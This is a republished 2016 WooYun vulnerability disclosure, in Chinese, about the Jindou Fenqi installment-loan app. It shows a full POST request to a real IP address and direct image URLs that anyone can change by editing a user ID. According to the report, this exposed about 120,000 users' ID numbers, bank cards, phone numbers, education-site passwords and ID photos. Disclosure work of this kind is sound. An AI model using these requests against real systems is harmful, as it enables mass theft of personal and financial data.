金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

admin
admin
admin
108455
文章
90
评论
2017年5月3日06:17:22评论388 views字数 249阅读0分49秒阅读模式
摘要

2016-04-30: 细节已通知厂商并且等待厂商处理中
2016-04-30: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(16) 关注此漏洞

缺陷编号: WooYun-2016-203642

漏洞标题: 金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

相关厂商: jindoufenqi.com

漏洞作者: 路人甲

提交时间: 2016-04-30 10:34

公开时间: 2016-05-09 09:00

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 认证设计不合理

6人收藏

漏洞详情

披露状态:

2016-04-30: 细节已通知厂商并且等待厂商处理中
2016-04-30: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

求个20

详细说明:

http://android.myapp.com/myapp/detail.htm?apkName=com.example.jindou

下载APP

1.越权问题,APP多接口可越权,并能通过burpsuite遍历获取用户数据

例如

获取用户资料接口

code 区域 
POST http://60.211.217.162:9001/fqApi/api/stuUser/getStuUser.do HTTP/1.1
 Content-Length: 203
 Content-Type: text/plain; charset=UTF-8
 Host: 60.211.217.162:9001
 Connection: Keep-Alive
 User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; Google Nexus 4 - 4.1.1 - API 16 - 768x1280_2 Build/JRO03S) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
 Cookie: JSESSIONID=4360C221EB109302BF98509849CDB560
 Cookie2: $Version=1
 Accept-Encoding: gzip
 
 {"header":{"device":"Genymotion,Google Nexus 4 - 4.1.1 - API 16 - 768x1280_2,vbox86p","macadd":"123456","platform":"generic,ANDROID,4.1.1"},"request":{"params":{"USER_ID":"110077"},"tokencode":"117386"}}

查看返回数据包涵那些数据(这是user_id=110077的返回数据)

金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

由上往下分别是

银行卡号,邮箱,身份证,手机号,还有一个手机验证的密码(不知道用来干啥),学信网账号跟密码

遍历user_id

金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

这边只列出银行卡号跟身份证号还有姓名

金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

甚至还有用户学信网的账号跟密码

可登陆查看学信档案

金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

身份证图片文件未授权访问。同样能遍历

手持身份证图片

code 区域 
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/hold.jpg?time=1461941777435

学生证

code 区域 
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/stucard.jpg?time=1461941777435

身份证图片

code 区域 
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/front.jpg?time=1461941777435

同样能遍历,遍历链接中的user_id(上面的userid是110077)

例如

code 区域 
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110048/hold.jpg?time=1461941777435
code 区域 
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110047/hold.jpg?time=1461941777435

全站数据,不是问题

3.紧急联系人越权获取

金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

同样能遍历,就不演示了

漏洞证明:

修复方案:

加上会话,做好权限控制

给个20Rank吧

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-09 09:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-05-09 11:20 | 灬相随灬 ( 普通白帽子 | Rank:395 漏洞数:76 | 大胆天下去得,小心寸步难行。)

    0

    已被忽略

  2. 2016-05-09 11:33 | apple ( 路人 | Rank:10 漏洞数:7 | 这个苹果非常懒,只留下一颗果核)

    0

    这也忽略,真厉害.....

  3. 2016-05-11 15:49 | 乱雪 ( 路人 | Rank:2 漏洞数:3 | 一事无成,身心半健,穷。)

    3

    什么垃圾厂商,无视信息安全,等信息安全法下来判刑吧。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin